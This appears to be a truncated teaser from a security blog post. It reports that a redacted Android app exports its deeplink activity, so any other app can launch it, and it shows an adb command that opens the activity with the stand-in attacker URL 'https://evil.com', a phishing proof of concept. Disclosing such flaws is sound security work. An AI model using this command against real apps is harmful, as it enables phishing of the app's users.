Phishing in Android
The app can be launched by any other app because its deeplink activity is exported=true.
Adb exploit
adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com"
Apk Exploi...
thesecurityguy.hashnode.dev1 min read